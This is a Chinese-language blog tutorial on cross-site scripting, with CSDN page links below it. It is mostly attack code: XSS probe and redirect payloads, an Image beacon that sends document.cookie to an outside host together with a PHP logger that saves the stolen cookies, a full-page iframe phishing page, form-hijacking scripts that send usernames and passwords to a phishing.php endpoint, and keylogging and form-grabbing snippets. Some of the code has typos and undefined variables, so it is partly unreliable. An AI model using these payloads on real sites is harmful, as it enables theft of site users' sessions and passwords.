XSS 专题一 XSS 基本知识

最新推荐文章于 2022-08-03 13:00:02 发布
最新推荐文章于 2022-08-03 13:00:02 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: XSS 跨站脚本 文章标签: XSS 跨站脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcc526/article/details/13018759
版权

一.入门

<html>
    <head>test</head>
    <meta http-equiv="refresh" content="0;">
    <body>
        <script> alert("xss") </script>
        <iframe src="http://www.baidu.com" width=0 height=0></iframe>
    </body>
</html>

二.判断是否存在XSS

输入

<script>alert(/XSS/)</script>
<script>alert("XSS")</script>
</textarea> <script> alert(/XSS/) </script> <textarea> #如果被嵌入在textarea中
<img src="javascript:alert('XSS');"> 
"'><script>document.location.href="http://www.baidu.com"</script> #XSS钓鱼
'><iframe src="http://www.baidu.com" height="100%" width="100%" ></iframe> 

三.XSS Cheat Sheet

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

四.查看Cookie

javascript:alert(document.cookie)   在地址栏输入

五.盗取Cookie

   如果网站使用了Httponly的Cookie,可防止Cookie被恶意JavaScript脚本存取

客户端

<script>
img=new Image();
img.src="http://www.baidu.com/cookie.asp?cookie="+document.cookie;
img.width=0;
mg.height=0;
</script>
php远端 

<?php
$cookie=$_GET['cookie'];
$log=fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>

六.跨站钓鱼

<html>
<head>
    <meta charset="UTF-8">
    <title></title>
</head>
<body scroll="no">
    <iframe src="http://www.baidu.com" height="100%" width="100%" scrolling="auto" frameborder="0" οnlοad="this.style.height=document.body.clientHeight"></iframe>
</body>
</html>

七.JavaScript劫持HTML表单

<script>
Form=document.forms["userslogin"];
Form.οnsubmit=function(){
    var iframe=document.createElement("iframe");
    iframe.style.display="none";
    alert(Form.user.value)
    iframe.src="http://127.0.0.1/phishing.php?user="+Form.user.value+"&passs="+Form.pass.value;
    document.body.appendChild(iframe);
}
</script>

或者使用

<script>
    loginForm=document.forms['userlogin'];
    function parseData()
    {
        var user=loginForm.user.value;
        var pass=loginForm.pass.value;
        saveData(username,password);
        return true;
    }
    function saveData(username,password)
    {
        var frame=document.createElement('iframe');
        frame.src="http://127.0.0.1/phishing.php?user="+user+"&pass="+pass;
        frame.style.display='none';
        document.body.appendChild(frame);
    }
    loginForm.οnsubmit=parseData;
</script>

7.2 键盘记录

 劫持onclick事件

for(i=0;i<document.links.length;i++){
  document.links[i].οnclick=hijack;
}

 监听onkeydown事件

document.οnkeydοwn=function(e){
    if(!e) e=window.event;
    try{ hijcak(); } catch(ex) { }
}
劫持表单 
document.οnkeyup=function(){
document.forms['PassFormlogin'].οnsubmit=function(){
 pwd=this.PassInputUsername0.value+'|'+this.PassInputPassword0.value;
 log(escape(pwd));
}
}

遍历表单

function grabber(){
    F=document.forms;
    for(var j=0;j<F.length;++j)
    {
        f=F[j];
        for(i=0;i<f.length;++i)
        {
          if(f[i].type.toLowerCase()=="password")
          {
             alert("Password:"+f[i].value)
          }
          else if(f[i].type.toLowerCase()!="submit")
          {
             alert("Text:"+f[i].value)
          }
        }
    }
}

在IE浏览器中可以使用以下,捕获特定键

<script>
function keyDown(){
    var keycode=event.keyCode;
    var realkey=String.fromCharCode(event.keyCode);
    alert("按键码: "+keycode+" 字符: "+realkey);

    document.οnkeydοwn=keyDown;

}
</script>











wcc526
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS 基础知识(学习笔记)
weixin_49467532的博客
10-15 374
XSS漏洞 什么是XSS XSS跨站脚本。攻击者把恶意脚本代码注入到网站中,等待其他用户浏览这些网页,从而触发执行恶意代码。 跨站脚本是一个Web安全漏洞,攻击者可以利用该漏洞来破坏用户与易受攻击的应用程序之间的交互。它允许攻击者规避相同的源策略,该策略旨在将不同的网站彼此隔离。跨站脚本漏洞通常允许攻击者伪装成受害者用户,执行用户可以执行的任何操作以及访问用户的任何数据。如果受害用户在应用程序内具有特权访问权限,则攻击者可能能够完全控制应用程序的所有功能和数据。 XSS通过操纵易受攻击的网站来工作,
OWASP TOP 10
weixin_45515936的博客
04-01 309
OWASP TOP 10 13年版已升级-2017版本 参考: https://blog.csdn.net/wang_624/article/details/89683571?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522159198134219725211934408%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=15919813
XSS基础知识
AmyBaby00的博客
09-29 708
XSS原理 XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的。现在让我们来普及一下XSS的一些常识 XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。 它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。 在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制。 XSS攻击的主要目的则是,想办法获取
XSS基础
qq_57157540的博客
04-25 3347
a.XSS和SQL注入攻击中的攻击指令都是由黑客通过用户输入域注入,只不过XSS注入的是HTML代码(以后称脚本),而SQL注入注入的是SQL命令。 b.XSS和SQL注入攻击都利用了Web服务器没有对用户输入数据进行严格的检查和有效过滤的缺陷 。 c.SQL注入的SQL命令在用户浏览器中执行,而XSS跨站脚本在Web后台数据库中执行。 d.XSS攻击盗取Web终端用户的敏感数据,甚至控制用户终端操作;SQL注入攻击盗取Web后台数据库中的敏感数据,甚至控制整个数据库服务器
XSS知识点
C_LCH_2000的博客
07-26 621
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。它是指 恶意攻击者将恶意的Script代码插入进Web页面中,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击。...
红色学习活动专题网站 v9.5
10-01
"红色学习活动专题网站 v9.5"是一个专门设计用于创建学习专题的网站管理系统,它采用了鲜明的红色主题,宽屏页面布局,给人一种庄重且专业的感觉,特别适合用于各类学习、教育或纪念性的专题活动。宁志网站管理系统...
红色学习活动专题网站 v9.9
09-30
"红色学习活动专题网站 v9.9" 是一个专门针对学习活动建设的网站管理系统,它采用了具有中国特色的红色风格设计,宽屏布局使得整体页面显得大气且专业。这个系统是针对那些希望快速建立专题学习网站的用户而设计的,...
guoke.zip_专题秒杀后台_小程序
最新发布
09-23
这个“guoke.zip_专题秒杀后台_小程序”压缩包包含了一个专门针对小程序设计的秒杀后台系统,下面将详细阐述其中涉及的知识点。 1. **小程序开发**: - **微信小程序**:这是一种轻量级的应用开发框架,由腾讯公司...
XYCMS庆祝建国70周年专题系统 v1.0
09-30
XYCMS庆祝建国70周年专题系统 v1.0是一款专为纪念中华人民共和国成立70周年设计的网站内容管理系统。这个系统允许用户通过后台便捷地更新和管理网站内容,以展示与国庆相关的资讯、图片和活动信息。以下是关于XYCMS...
java筑基(基础)面试专题系列(一):Tomcat+Mysql+设计模式.zip
06-30
Java筑基面试专题系列是针对Java开发者准备的基础面试知识,主要涵盖了三个核心领域:Tomcat、MySQL和设计模式。这三者在Java开发中都扮演着至关重要的角色,是任何Java程序员都需要掌握的基础技能。 首先,让我们...
XSS相关知识点
weixin_50931715的博客
08-03 1172
它是基于DoM文档对象模型的一种漏洞,并且DOM型XSS是基于JS上的,并不需要与服务器进行交互。不同于反射型XSS和存储型XSS,基于DOM的XSS跨站脚本攻击往往需要针对具体的 Javascript DOM代码进行分析,并根据实际情况进行XSS跨站脚本攻击的利用。形成XSS漏洞的主要原因是程序对输入和输出的控制过滤不够完善、严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。在危害性上:存储型XSS > DOM-XSS > 反射型XSS。二、XSS产生的原因。...
XSS相关知识
Miracle_ze的博客
07-25 352
XSS相关知识
XSS基础题
剁椒咸鱼
10-08 264
XSS基础用法: (脚本关14: 当 这道题,先看下面有guest的文本框,当点击提交查询时会更新下面框的内容 所以可以从下面的文本框下手攻击。先查看这个文本框源代码 看到时在input的value中,于是闭合input,输入 alert'onmouseover=alert(HackingLab)>,再看下源码: 成功闭合!鼠标移到input框时,alert HackingLab. ...
面试题之XSS攻击
xiaoyaGrace的博客
05-18 433
XSS跨域脚本攻击原理无需登录认证,核心原理就是向你的页面注入脚本。1、反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。2、存储型:存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码。(例如:常见的评论,在文本框中输入一段代码,那么就会存放在数据库当中,当再次加载的时候便会执行这样的代码)。常见的场景留言、评论、注册、
网络面试知识点
Moonoly的博客
03-01 1604
针对网络知识面试点的整理,包括http、https协议,网络安全,负载均衡等知识点。
Masuit.Tools,一个免费的轮子
寒冰屋的专栏
10-24 2497
开源地址: https://gitee.com/masuit/Masuit.Tools 包含一些常用的操作类,大都是静态类,加密解密,反射操作,动态编译,权重随机筛选算法,简繁转换,分布式短id,表达式树,linq扩展,文件压缩,多线程下载和FTP客户端,硬件信息,字符串扩展方法,日期时间扩展操作,中国农历,大文件拷贝,图像裁剪,验证码,断点续传,实体映射、集合扩展等常用封装。 建议开发环境 操作系统:Windows 10 1903及以上版本 开发工具:VisualStudio2019 v16.5及
xss入门之平台搭建
weixin_45018333的博客
06-03 2999
1.xss源码: https://download.csdn.net/download/weixin_45018333/12492658 2.下载,解压到www目录下。 3.导入数据库 打开PHPmyadmin->点击数据库->新建数据库,命名为xssplatform->点击创建 4.将数据导入数据库–这里将xssplatform.sql数据库文件导入数据库 (备注:正常情况下到这里,xss文件夹下面是没有.htaccess的,我的弄好了,后面说。) 创建数据库以后,点击xssplat
XSS简述
qq_62098017的博客
09-20 2148
绕过推荐 XSS绕过可以看看该文章:XSS过滤绕过速查表 0.介绍 跨站攻击,即Cross Site Script Execution(通常简写为XSS),是前端的漏洞,产生在浏览器一端的漏洞。它是指攻击者在网页中嵌入客户端脚本,主要利用js编写的恶意代码来执行一些想要的功能,也就是说它能干嘛是受到js的控制,那么js能执行出什么脚本代码就取决于它能干嘛。当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。 0.1.能干嘛 常规用到的是盗取cookie、js做钓鱼攻击、流
java jvm 参数 -Xms -Xmx -Xmn -Xss 调优总结
soledede
08-03 9036
  堆大小设置 JVM 中最大堆大小有三方面限制: 1.相关操作系统的数据模型(32-bt还是64-bit)限制; 2.系统的可用虚拟内存限制; 3.系统的可用物理内存限制. 在32位系统下,一般限制在1.5G~2G;64为操作系统对内存无特定限制.  在Windows Server 2003 系统,3.5G物理内存,JDK5.0下测试,最大可设置为1478m. 典型设置: java -X...
xss注入讲解ppt.pptx
08-10
三种xss基础知识的讲解

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值